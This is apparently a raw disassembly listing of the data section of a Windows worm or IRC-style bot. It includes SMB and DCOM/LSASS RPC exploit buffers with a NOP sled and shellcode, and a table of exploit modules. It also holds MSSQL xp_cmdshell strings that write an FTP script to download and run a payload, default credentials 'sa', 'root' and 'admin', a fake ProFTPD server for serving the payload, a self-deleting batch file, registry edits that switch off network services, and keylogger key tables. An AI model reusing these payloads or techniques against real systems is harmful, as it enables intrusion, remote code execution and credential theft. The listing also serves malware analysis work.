dword_402218 dd 81001h, 0CCCCCCCCh, 20h, 2D0030h, 0 dd 0C2A88h, 2, 1, 0C8C28h, 1, 7, 2 dup(0)
dword_40224C dd 2180310h dword_402250 dd 10016C6h dd 100139Dh, 1001C55h, 1001C98h ; DATA XREF: sub_405DB7+1DA�o
dd 5F5C0A0Dh, 2E2Fh ; DATA XREF: sub_405DB7+3D�o
; sub_405DB7+302�o ...
dword_402268 dd 30B0005h, 10h, 48h, 0 dd 16D016D0h, 0
dd 1, 10000h, 4D9F4AB8h, 11CF7D1Ch, 20001E86h, 577C6EAFh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_4022B4 dd 3000005h, 10h, 5 dup(0)dword_4022D0 dd 10005h, 2 dup(0) dd 75757D58h, 47C6EB40h, 0A74E71BCh, 97B5D01Ch, 5 dup(0)
dd 90000h, 300h, 0
dd 300h, 5C005Ch, 0
dword_402318 dd 0 dd 2, 0
dd 1, 91C68h, 1, 2 dup(0)
dd 0C0h, 46000000h, 2 dup(1), 7
; ---------------------------------------------------------------------------
loc_40234C: ; DATA XREF: sub_405DB7+44C�o
mov eax, [esp-4]
add eax, 0FFFFFAE0h
jmp eax
; ---------------------------------------------------------------------------
align 4
loc_402358: ; DATA XREF: sub_405DB7+3F7�o
mov eax, [ebp+30h]
add eax, 0FFFFFB24h
jmp eax
; ---------------------------------------------------------------------------
align 4
loc_402364: ; DATA XREF: sub_405DB7+49B�o
jmp short loc_402376
; ---------------------------------------------------------------------------
jmp short loc_402381
; ---------------------------------------------------------------------------
dd 0
; ---------------------------------------------------------------------------
loc_40236C: ; DATA XREF: sub_405DB7+4F6�o
jmp short near ptr word_402372
; ---------------------------------------------------------------------------
dw 0FFFFh
db 2 dup(0FFh)
word_402372 dw 0 ; CODE XREF: MEW:loc_40236C�j
; ---------------------------------------------------------------------------
loc_402374: ; DATA XREF: sub_405DB7+517�o
jmp short near ptr word_40237A
; ---------------------------------------------------------------------------
loc_402376: ; CODE XREF: MEW:loc_402364�j
; MEW:00402394�j
jmp short loc_40237C
; ---------------------------------------------------------------------------
db 2 dup(0)
word_40237A dw 0 ; CODE XREF: MEW:loc_402374�j
; ---------------------------------------------------------------------------
loc_40237C: ; CODE XREF: MEW:loc_402376�j
; DATA XREF: sub_405DB7+53B�o
jmp short near ptr loc_402381+1
; ---------------------------------------------------------------------------
dw 0FFFFh
db 0FFh
; ---------------------------------------------------------------------------
loc_402381: ; CODE XREF: MEW:00402366�j
; MEW:loc_40237C�j
inc dword ptr [eax]
; ---------------------------------------------------------------------------
db 0
off_402384 dd offset dword_41005C ; DATA XREF: sub_405DB7+595�o
align 10h
dword_402390 dd 77F33723h ; ---------------------------------------------------------------------------
jmp short loc_402376 ; DATA XREF: sub_405DB7+4D4�o
; ---------------------------------------------------------------------------
dw 7FFDh
; ---------------------------------------------------------------------------
lahf ; DATA XREF: sub_405DB7+4AD�o
jnz short loc_4023B3
add [ecx+1Ch], bl ; DATA XREF: sub_405DB7+43C�o
loc_40239E: ; CODE XREF: MEW:loc_4023A8�j
add [ecx], al
loc_4023A0: ; DATA XREF: sub_405DB7+41E�o
or ecx, [ebx]
sbb eax, [eax]
loc_4023A4: ; DATA XREF: sub_405DB7+42D�o
; sub_40785E+25D�o
jmp short near ptr dword_4023AC
; ---------------------------------------------------------------------------
align 4
loc_4023A8: ; DATA XREF: sub_405DB7+409�o
jmp short loc_40239E
; ---------------------------------------------------------------------------
align 4
dword_4023AC dd 85000000h ; DATA XREF: MEW:00406891�o
; ---------------------------------------------------------------------------
call dword ptr [ebx+4Dh]
loc_4023B3: ; CODE XREF: MEW:00402399�j
inc edx
jb short $+2
; ---------------------------------------------------------------------------
dw 0
dd 0C8531800h, 3 dup(0)
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0
db 2
db 4Ch ; L
db 41h, 4Eh, 4Dh
db 41h ; A
db 4Eh, 31h, 2Eh
db 30h ; 0
align 2
dw 5702h
aIndowsForWorkg db 'indows for Workgroups 3.1a',0
db 2
dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
dd 544E0200h, 204D4C20h, 32312E30h, 0
dword_402438 dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: MEW:004068CD�o
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows2000219:
unicode 0, <Windows 2000 2195>,0
aWindows20005_0:
unicode 0, <Windows 2000 5.0>,0
align 10h
dd 0
dword_4024E4 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: MEW:00406909�o
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dword_4025C4 dd 54000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_4063DC+8C�o
dd 0FEFF0000h, 300800h, 5C00FF04h, 1000800h, 3100h, 5C005Ch
dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h, 310032h
dd 5C0030h, 500049h
aC: ; DATA XREF: sub_4063DC+BB�o
unicode 0, <C$>,0
a????? db '?????',0
align 8
dword_402628 dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_4063DC+2AB�o
dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 1103h, 6C005Ch, 610073h, 700072h, 63h
dd 0
dword_402694 dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_4063DC+2DD�o
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_402738 dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_4063DC+3D2�o
dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0)
dd 0A0005400h, 200540Ch, 2600h, 100CB140h, 50005Ch, 500049h
dd 5C0045h, 0
dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0
dd 3ECh, 0
off_4027B8 dd offset byte_401495 ; DATA XREF: sub_4063DC+400�o
dd 3, 40707Ch, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd offset loc_40707A+2
dd 1, 0
dd 1, 0
dd offset loc_40707A+2
dd 1, 0
dd 1, 0
dd offset loc_40707A+2
dd 1, 0
dd 1, 0
dd 138578h, 0E9A65BABh, 0
dword_40284C dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0)
; DATA XREF: sub_4063DC+31A�o
dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h
dd 8FFFFFFh, 10B800h, 4010B800h, 0
dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h
dd 0DADh, 0
dd 0DADh, 0
dword_4028B8 dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_4063DC+345�o
dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
dd 5C0045h, 0
dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 0
dword_40292C dd 0 dd offset loc_40A899+1
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd offset loc_40A899+1
dd 1, 0
dd 1, 0
dd offset loc_40A899+1
dd 1, 0
dd 1, 0
dd offset loc_40A899+1
dd 1, 0
dd 1, 2 dup(0)
dword_4029B4 dd 1004600h dd 7515123Ch, 751C123Ch
; ---------------------------------------------------------------------------
jmp short loc_4029C8 ; DATA XREF: sub_4063DC+172�o
; ---------------------------------------------------------------------------
jmp short loc_4029CA
; ---------------------------------------------------------------------------
align 8
loc_4029C8: ; CODE XREF: MEW:004029C0�j
; DATA XREF: sub_4063DC+5C�o
pop esp
pop esp
loc_4029CA: ; CODE XREF: MEW:004029C2�j
and eax, 70695C73h
arpl [eax+eax], sp
; ---------------------------------------------------------------------------
dw 0
dword_4029D4 dd 1CEC8166h dword_4029D8 dd 0E4FF07h dword_4029DC dd 34000112h, 0 dd 150000h, 1B000106h, 20100h, 30C001Ch, 4002800h, 20008FFh
dd 10h, 0
; ---------------------------------------------------------------------------
loc_402A04: ; DATA XREF: MEW:00406B45�o
; MEW:00406B53�o
mov edx, 5042B68Ah
push ds
rol byte ptr [edx+74h], 1 ; DATA XREF: MEW:00406D1C�o
xchg esi, [edx+eax*2+7FFDE0CCh] ; DATA XREF: MEW:00406D39�o
loc_402A14: ; DATA XREF: MEW:00406E6A�o
add al, 90h
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
fmul st(1), st
mov al, 42h
nop
nop
nop
nop
nop
nop
jmp short near ptr byte_402A89
; ---------------------------------------------------------------------------
db 1, 70h, 0AEh
dd 0AE700142h
db 42h
byte_402A89 db 3 dup(0) ; CODE XREF: MEW:00402A7F�j
dword_402A8C dd 12400h, 0 a3333 db '3333',0 ; DATA XREF: MEW:00406B7B�o
align 4
aCccc db 'CCCC',0 ; DATA XREF: MEW:00406B33�o
align 4
aEu4 db 1Bh,'4',0 ; DATA XREF: MEW:00406B21�o
align 4
asc_402AAC: ; DATA XREF: MEW:00406A46�o
dw 0Dh
unicode 0, <>,0
a512 db '512',0 ; DATA XREF: MEW:00406D65�o
aIiii db 'ii',0 ; DATA XREF: MEW:00406D2E�o
align 4
aH888r db 'h:888',0 ; DATA XREF: MEW:00406D0A�o
align 4
aR_0 db '/\r',0Ah ; DATA XREF: MEW:00406C48�o
; MEW:00406DD3�o
db ':',0
align 4
aExecMaster___0 db 'EXEC master..xp_cmdshell ',27h,'del %s &%s &call %s',27h,0
; DATA XREF: MEW:00407074�o
align 4
; aExecMaster(long long, *)
aExecMaster__xp db 'EXEC master..xp_cmdshell ',27h,'echo open %s %d >> %s &echo user %s '
; DATA XREF: MEW:0040702E�o
db '%s >> %s &echo get %s >> %s &echo quit >> %s &ftp -n -s:%s',0Dh,0Ah
db 27h,0
aS_txt db '%s.txt',0 ; DATA XREF: MEW:00406FCA�o
align 10h
aDriverSqlServe db 'DRIVER={SQL Server};SERVER=%s;UID=sa;PWD=%s;%s',0
; DATA XREF: MEW:00406F69�o
align 10h
aAdmin db 'admin',0 ; DATA XREF: MEW:00406EE6�o
align 4
aRoot db 'root',0 ; DATA XREF: MEW:00406EDF�o
align 10h
aSa db 'sa',0 ; DATA XREF: MEW:00406ED4�o
align 8
dword_402BC8 dd 6D6F6364h ; sub_404530+7F7�r ...
dd 353331h, 3 dup(0)
off_402BDC dd offset dword_402E50 ; DATA XREF: sub_404530+80F�r
; sub_404530+8E5�r ...
dword_402BE0 dd 87h ; sub_404530+60F�r ...
off_402BE4 dd offset sub_405DB7 ; DATA XREF: sub_407282+1B4�r
; sub_407282+211�r
dword_402BE8 dd 0 ; sub_404530+A9E�r ...
dword_402BEC dd 1 ; sub_405DB7+30D�r ...
byte_402BF0 db 1 ; DATA XREF: sub_404530+809�r
; sub_404530+833�w ...
align 4
aDcom445 db 'dcom445',0
dd 3 dup(0)
dd offset dword_402E44
dd 1BDh, 405DB7h, 0
dd 2, 1, 31637072h, 3533h, 3 dup(0)
dd offset dword_402E38
dd 87h, 4060A4h, 0
dd 3, 1, 34637072h, 3534h, 3 dup(0)
dd offset dword_402E2C
dd 1BDh, 4060A4h, 0
dd 4, 1, 7361736Ch, 35343473h, 3 dup(0)
dd offset dword_402E20
dd 1BDh, 406828h, 0
dd 5, 1, 7361736Ch, 35333173h, 3 dup(0)
dd offset dword_402E14
dd 87h, 406828h, 0
dd 6, 1, 7173736Dh, 7361706Ch, 73h, 2 dup(0)
dd offset dword_402E04
dd 599h, 406EBAh, 0
dd 7, 1, 69726576h, 736174h, 3 dup(0)
dd offset dword_402DF8
dd 2710h, 407983h, 0
dd 9, 1, 7173736Dh, 6Ch, 3 dup(0)
dd offset dword_402DF0
dd 599h, 406A33h, 0
dd 0Ah, 1, 7173736Dh, 3030326Ch, 30h, 2 dup(0)
dd offset dword_402DE4
dd 599h, 406C37h, 0
dd 0Bh, 1, 7173736Dh, 7064756Ch, 3 dup(0)
dd offset dword_402DD8
dd 599h, 406DC2h, 0
dd 0Ch, 1, 0Bh dup(0)
dword_402DD8 dd 7173736Dh, 7064756Ch, 632Ehdword_402DE4 dd 7173736Dh, 3030326Ch, 632E30hdword_402DF0 dd 7173736Dh, 632E6Chdword_402DF8 dd 69726576h, 2E736174h, 63hdword_402E04 dd 7173736Dh, 7361706Ch, 74662E73h, 6470hdword_402E14 dd 7361736Ch, 35333173h, 632Ehdword_402E20 dd 7361736Ch, 35343473h, 632Ehdword_402E2C dd 34637072h, 632E3534h, 0dword_402E38 dd 31637072h, 632E3533h, 0dword_402E44 dd 6D6F6364h, 2E353434h, 63hdword_402E50 dd 6D6F6364h, 2E353331h, 63hdword_402E5C dd 56495250h, 2047534Dh, 3A207325h, 3430032Dh, 61637302h
; DATA XREF: sub_407282+242�o
dd 72656E6Eh, 202D0203h, 6E65706Fh, 726F7020h, 6F662074h
dd 3A646E75h, 30032D20h, 73250233h, 364253Ah, 28202D02h
dd 65726874h, 203A6461h, 0D296425h, 0Ah
dword_402EA8 dd 56495250h, 2047534Dh, 3A207325h, 6E616353h, 676E696Eh
; DATA XREF: sub_407282+5F�o
dd 32D203Ah, 25023330h, 64253A73h, 202D0203h, 72687428h
dd 73646165h, 3003203Ah, 64250233h, 2D290203h, 6C656428h
dd 203A7961h, 2333003h, 2036425h, 6D282D29h, 74756E69h
dd 203A7365h, 2333003h, 2036425h, 6C282D29h, 6369676Fh
dd 61637320h, 3203A6Eh, 25023330h, 29020373h, 0A0Dh
aDisabled db 'disabled',0 ; DATA XREF: sub_407282+34�o
align 4
aEnabled db 'enabled',0 ; DATA XREF: sub_407282+2D�o
byte_402F34 db 0A2h ; DATA XREF: sub_407617+A2�r
; sub_407617+CE�w
align 4
dword_402F38 dd 4113E68Bh ; sub_407617+8F�w
; ---------------------------------------------------------------------------
loc_402F3C: ; DATA XREF: sub_407617+1A�o
jmp short loc_402F53
; ---------------------------------------------------------------------------
loc_402F3E: ; CODE XREF: MEW:loc_402F53�p
mov ecx, 0
xor ecx, 0
pop esi
loc_402F4A: ; CODE XREF: MEW:00402F4F�j
xor byte ptr [ecx+esi-1], 0
loop loc_402F4A
jmp short near ptr dword_402F58
; ---------------------------------------------------------------------------
loc_402F53: ; CODE XREF: MEW:loc_402F3C�j
call loc_402F3E
; ---------------------------------------------------------------------------
dword_402F58 dd 0 dword_402F5C dd 8B64DB33h, 408B3043h, 1C708B0Ch, 8408BADh, 33685353h
; DATA XREF: sub_40758E+23�o
dd 68000032h, 5F327377h, 747268h, 736D6800h, 34E86376h
dd 1000000h, 35000000h, 74D60862h, 0C0942023h, 0B9CAC999h
dd 0B969155Ch, 0D740F640h, 850DB302h, 9CC44DF9h, 8318041Ah
dd 0C01AD301h, 80071302h, 0B4070334h, 5D28398Ah, 8B5B026Ah
dd 8B5353F8h, 548B3C57h, 0D703783Ah, 20528B52h, 0DB33D703h
dd 9A348B43h, 0C933F703h, 0C1C832ACh, 84AC05C1h, 8BF675C0h
dd 4C2B0075h, 0E47500B5h, 8B243487h, 0D7032456h, 5A0C8B66h
dd 31C568Bh, 8A048BD7h, 895EC703h, 0FF00B544h, 4B5B0045h
dd 835BB075h, 0FF5402C3h, 0C4830855h, 75C08508h, 2B02B49Eh
dd 54C48AE0h, 1C55FF50h, 685050h, 68000000h, 2, 6A50FC8Bh
dd 0FF026A01h, 0D88B2055h, 5357106Ah, 852455FFh, 0C75975C0h
dd 45h, 6A500000h, 0FF535504h, 0F48B2C55h, 770045C7h, 68000062h
dd 657865h, 68h, 55FC8B2Eh, 0C55FF57h, 6A004589h, 2006800h
dd 53560000h, 852855FFh, 781174C0h, 75FF1Bh, 56016A50h
dd 831055FFh, 0DFEB10C4h, 0FF0075FFh, 54501455h, 1855FF57h
dd 3055FF53h, 455FFh
dword_4030B0 dd 56495250h, 2047534Dh, 3A207325h, 3430032Dh, 3732502h
; DATA XREF: sub_407708+131�o
dd 25202D02h, 65202E64h, 6F6C7078h, 64657469h, 30032820h
dd 73250233h, 20290203h, 33300328h, 3732502h, 73202902h
dd 65636375h, 6C756673h, 0A0D796Ch, 0
dword_4030FC dd 6272h ; sub_407BC9:loc_407C1C�o ...
aUnknown db 'unknown',0 ; DATA XREF: sub_407708+6F�o
aShellcodedaemo db 'ShellcodeDaemon',0 ; DATA XREF: sub_40785E+15�o
; sub_40933F+167�o
aA db '',0 ; DATA XREF: sub_40785E+2D7�o
db '"(',0
db 2 dup(0), 1
dd 2 dup(0)
dd 1090000h, 2 dup(0)
dd 3000000h, 20000h, 0
dword_403140 dd 4000000h, 0 dword_403148 dd 200000h, 0 dword_403150 dd 0FFF817E9h, 0FFhdword_403158 dd 140F8D5h, 0 dword_403160 dd 0FFFBF3E9h, 0FFhdword_403168 dd 14261B0h, 0 dword_403170 dd 4000500h, 7868746Bh, 0dword_40317C dd 56495250h, 2047534Dh, 3A207325h, 3430032Dh, 726F7702h
; DATA XREF: sub_407BC9+23E�o
dd 6469726Dh, 66742E65h, 2037074h, 7865202Dh, 696F6C70h
dd 20646574h, 2333003h, 2037325h, 30032820h, 73250233h
dd 20290203h, 63637573h, 75667365h, 0D796C6Ch, 0Ah
aTftpdhijack db 'TFTPDHijack',0 ; DATA XREF: sub_407BC9+19�o
; sub_40933F+12B�o
a221Goodbye_ db '221 Goodbye.',0Ah,0 ; DATA XREF: sub_407F46+5A0�o
align 4
aQuit db 'QUIT',0 ; DATA XREF: sub_407F46+58C�o
align 10h
dword_4031F0 dd 56495250h, 2047534Dh, 3A207325h, 3430032Dh, 70746602h
; DATA XREF: sub_407F46+561�o
dd 2D020364h, 2E642520h, 6E657320h, 666F2064h, 20732520h
dd 63637573h, 20646565h, 28206F74h, 2333003h, 2037325h
dd 3282029h, 25023330h, 29020373h, 0A0Dh
a425CanTOpenDat db '425 Can',27h,'t open data connection.',0Ah,0
; DATA XREF: sub_407F46+51D�o
; sub_407F46+57F�o
align 10h
a226TransferC_0 db '226 Transfer complete.',0Ah,0 ; DATA XREF: sub_407F46+514�o
a150OpeningBina db '150 Opening BINARY mode data connection',0Ah,0
; DATA XREF: sub_407F46+4EE�o
align 4
aRetr db 'RETR',0 ; DATA XREF: sub_407F46+4D6�o
align 4
a200PortCommand db '200 PORT command successful.',0Ah,0 ; DATA XREF: sub_407F46+4C6�o
align 4
aS_S_S_S db '%s.%s.%s.%s',0 ; DATA XREF: sub_407F46+4B5�o
aXX db '%x%x',0Ah,0 ; DATA XREF: sub_407F46+482�o
align 10h
aS db '%*s %[^,],%[^,],%[^,],%[^,],%[^,],%[^',0Ah ; DATA XREF: sub_407F46+43B�o
db ']',0
aPort db 'PORT',0 ; DATA XREF: sub_407F46+402�o
align 10h
a226TransferCom db '226 Transfer complete',0Ah,0 ; DATA XREF: sub_407F46+3F2�o
align 4
aList db 'LIST',0 ; DATA XREF: sub_407F46+3DE�o
align 10h
a425PassiveNotS db '425 Passive not supported on this server',0Ah,0
; DATA XREF: sub_407F46+3CE�o
align 4
aPasv db 'PASV',0 ; DATA XREF: sub_407F46+3BA�o
align 4
a200TypeSetToA_ db '200 Type set to A.',0Ah,0 ; DATA XREF: sub_407F46+3AA�o
aI: ; DATA XREF: sub_407F46+396�o
unicode 0, <I>,0
aA_0: ; DATA XREF: sub_407F46+37F�o
unicode 0, <A>,0
aType db 'TYPE',0 ; DATA XREF: sub_407F46+368�o
align 4
a257IsCurrentDi db '257 "/" is current directory.',0Ah,0 ; DATA XREF: sub_407F46+358�o
align 4
aPwd db 'PWD',0 ; DATA XREF: sub_407F46+344�o
a350Restarting_ db '350 Restarting.',0Ah,0 ; DATA XREF: sub_407F46+334�o
align 10h
aRest db 'REST',0 ; DATA XREF: sub_407F46+320�o
align 4
a215UnixTypeL8 db '215 UNIX Type: L8',0Ah,0 ; DATA XREF: sub_407F46+310�o
align 4
aSyst db 'SYST',0 ; DATA XREF: sub_407F46+2FC�o
align 4
a230UserLoggedI db '230 User logged in.',0Ah,0 ; DATA XREF: sub_407F46+2EC�o
align 4
aPass db 'PASS',0 ; DATA XREF: sub_407F46+2D8�o
align 4
a331PasswordReq db '331 Password required',0Ah,0 ; DATA XREF: sub_407F46+2C8�o
align 4
aUser db 'USER',0 ; DATA XREF: sub_407F46+2B3�o
align 4
aSS db '%s %s',0 ; DATA XREF: sub_407F46+2A2�o
; sub_40A8E0+45�o
align 4
a220Proftpd1_D_ db '220 ProFTPD 1.%d.%d Server (ProFTPD Default Installation)',0Ah,0
; DATA XREF: sub_407F46+1F6�o
align 4
aFtpd db 'Ftpd',0 ; DATA XREF: sub_407F46+25�o
; sub_407F46+140�o ...
align 10h
aHttp db 'http://',0 ; DATA XREF: sub_40862D+B�o
aHttp1_ db 'http/1.',0 ; DATA XREF: sub_4086A6+B3�o
asc_403480 db 0Dh,0Ah ; DATA XREF: sub_4086A6+A0�o
db 0Dh,0Ah,0
align 4
aWb db 'wb',0 ; DATA XREF: sub_4086A6+62�o
align 4
aS_1 db '%s',0 ; DATA XREF: sub_4086A6+4B�o
; MEW:0040A1EA�o
align 10h
aGetSHttp1_0 db 'GET %s HTTP/1.0',0Dh,0Ah ; DATA XREF: sub_408825+85�o
db 0Dh,0Ah,0
align 8
aServicesactive db 'ServicesActive',0 ; DATA XREF: sub_408953+9�o
; sub_40914C+166�o
align 4
aImagepath db 'ImagePath',0 ; DATA XREF: sub_40899B+C3�o
align 4
aStart db 'Start',0 ; DATA XREF: sub_40899B+84�o
; sub_40914C+143�o
align 4
aSystemCurrentc db 'SYSTEM\CurrentControlSet\Services\%s',0 ; DATA XREF: sub_40899B+48�o
align 4
aNetwork db 'Network',0 ; DATA XREF: sub_408A88+143�o
aService db 'Service',0 ; DATA XREF: sub_408A88+FF�o
aMinimal db 'Minimal',0 ; DATA XREF: sub_408A88+F3�o
aSystemCurren_0 db 'SYSTEM\CurrentControlSet\Control\SafeBoot\',0
; DATA XREF: sub_408A88+D9�o
align 4
aSvchost_exe db 'svchost.exe',0 ; DATA XREF: sub_408E07+1C�o
aComspecCSSS db '%%comspec%% /c %s %s %s',0 ; DATA XREF: sub_408EAB+12A�o
a@echoOffRepeat db '@echo off',0Dh,0Ah ; DATA XREF: sub_408EAB+9B�o
db ':repeat',0Dh,0Ah
db 'del "%%1"',0Dh,0Ah
db 'if exist "%%1" goto repeat',0Dh,0Ah
db ':repeat2',0Dh,0Ah
db 'del "%%2"',0Dh,0Ah
db 'if exist "%%2" goto repeat2',0Dh,0Ah,0
align 4
aSerase_bat db '%serase.bat',0 ; DATA XREF: sub_408EAB+65�o
aControlHandler db 'Control Handler',0 ; DATA XREF: sub_408EAB:loc_408ED4�o
; sub_40933F+11A�o
asc_4035E8: ; DATA XREF: sub_409016+55�o
unicode 0, <\>,0
aMaxclientreque db 'MaxClientRequestBuffer',0 ; DATA XREF: sub_40914C+1D0�o
align 4
aSystemCurren_4 db 'SYSTEM\CurrentControlSet\Services\W3SVC\Parameters',0
; DATA XREF: sub_40914C+1BB�o
align 4
aNetworkDde db 'Network DDE',0 ; DATA XREF: sub_40914C+17E�o
aSystemCurren_3 db 'SYSTEM\CurrentControlSet\Services\NetDDE',0 ; DATA XREF: sub_40914C+12E�o
align 10h
aEnabledcom db 'EnableDCOM',0 ; DATA XREF: sub_40914C+10D�o
align 4
aN: ; DATA XREF: sub_40914C+105�o
unicode 0, <N>,0
aSoftwareMicros db 'SOFTWARE\Microsoft\OLE',0 ; DATA XREF: sub_40914C+F7�o
align 4
aNetbiosoptions db 'NetbiosOptions',0 ; DATA XREF: sub_40914C+A1�o
align 4
aSystemCurren_2 db 'SYSTEM\CurrentControlSet\Services\NetBT\Parameters\Interfaces\Tcp'
; DATA XREF: sub_40914C+72�o
db 'ip_%s',0
align 10h
aSystemCurren_1 db 'SYSTEM\CurrentControlSet\Services\TcpIp\Parameters\Adapters',0
; DATA XREF: sub_40914C+20�o
dword_40372C dd 0FFFFFFFFh ; sub_404530+2A6�r ...
off_403730 dd offset dword_403734 ; DATA XREF: sub_404530+66C�r
; sub_4055A6+6D9�r ...
dword_403734 dd 2E373231h, 2E302E30h, 31haProtocolHandle db 'Protocol Handler',0 ; DATA XREF: sub_40933F:loc_409445�o
align 4
aD_D_D_D db '%d.%d.%d.%d',0 ; DATA XREF: sub_40933F+CF�o
dword_403760 dd 30B0005h, 10h, 48h, 1, 16D016D0h, 0 dd 1, 10000h, 0AFA8BD80h, 11C97D8Ah, 8F4BEh, 8929102Bh
dd 1, 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_4037AC dd 3000005h, 10h, 18h, 1, 3 dup(0)dword_4037C8 dd 975201B0h, 11D059CAh, 0A000D5A8h, 51800DC9h, 0
; DATA XREF: sub_4096C8+118�o
dword_4037DC dd 1D55B526h, 46C5C137h, 8F6379ABh, 69E8682Ah, 0
; DATA XREF: sub_4096C8+13C�o
aDnsflushresolv db 'DnsFlushResolverCache',0 ; DATA XREF: sub_40969D+F�o
align 4
aDnsapi_dll db 'dnsapi.dll',0 ; DATA XREF: sub_40969D+2�o
align 8
dword_403818 dd 8 dword_40381C dd 62h db 3 dup(0)
dword_403823 dd 62h align 4
dd 0
dd 0Dh, 65h, 65000000h, 2 dup(0)
dd 1Bh, 4353455Bh, 5B00005Dh, 5D435345h, 0
dd 70h, 5D31465Bh, 5B000000h, 5D3146h, 0
dd 71h, 5D32465Bh, 5B000000h, 5D3246h, 0
dd 72h, 5D33465Bh, 5B000000h, 5D3346h, 0
dd 73h, 5D34465Bh, 5B000000h, 5D3446h, 0
dd 74h, 5D35465Bh, 5B000000h, 5D3546h, 0
dd 75h, 5D36465Bh, 5B000000h, 5D3646h, 0
dd 76h, 5D37465Bh, 5B000000h, 5D3746h, 0
dd 77h, 5D38465Bh, 5B000000h, 5D3846h, 0
dd 78h, 5D39465Bh, 5B000000h, 5D3946h, 0
dd 79h, 3031465Bh, 5B00005Dh, 5D303146h, 0
dd 7Ah, 3131465Bh, 5B00005Dh, 5D313146h, 0
dd 7Bh, 3231465Bh, 5B00005Dh, 5D323146h, 0
dd 0C0h, 60h, 7E000000h, 2 dup(0)
dd 2 dup(31h), 21000000h, 2 dup(0)
dd 2 dup(32h), 40000000h, 2 dup(0)
dd 2 dup(33h), 23000000h, 2 dup(0)
dd 2 dup(34h), 24000000h, 2 dup(0)
dd 2 dup(35h), 25000000h, 2 dup(0)
dd 2 dup(36h), 5E000000h, 2 dup(0)
dd 2 dup(37h), 26000000h, 2 dup(0)
dd 2 dup(38h), 2A000000h, 2 dup(0)
dd 2 dup(39h), 28000000h, 2 dup(0)
dd 2 dup(30h), 29000000h, 2 dup(0)
dd 0BDh, 2Dh, 5F000000h, 2 dup(0)
dd 0BBh, 3Dh, 2B000000h, 2 dup(0)
dd 9, 4241545Bh, 5B00005Dh, 5D424154h, 0
dd 51h, 71h, 51000000h, 2 dup(0)
dd 57h, 77h, 57000000h, 2 dup(0)
dd 45h, 65h, 45000000h, 2 dup(0)
dd 52h, 72h, 52000000h, 2 dup(0)
dd 54h, 74h, 54000000h, 2 dup(0)
dd 59h, 79h, 59000000h, 2 dup(0)
dd 55h, 75h, 55000000h, 2 dup(0)
dd 49h, 69h, 49000000h, 2 dup(0)
dd 4Fh, 6Fh, 4F000000h, 2 dup(0)
dd 50h, 70h, 50000000h, 2 dup(0)
dd 0DBh, 5Bh, 7B000000h, 2 dup(0)
dd 0DDh, 0
dd 7D000000h, 2 dup(0)
dd 41h, 61h, 61000000h, 2 dup(0)
dd 53h, 73h, 53000000h, 2 dup(0)
dd 44h, 64h, 44000000h, 2 dup(0)
dd 46h, 66h, 46000000h, 2 dup(0)
dd 47h, 67h, 47000000h, 2 dup(0)
dd 48h, 68h, 48000000h, 2 dup(0)
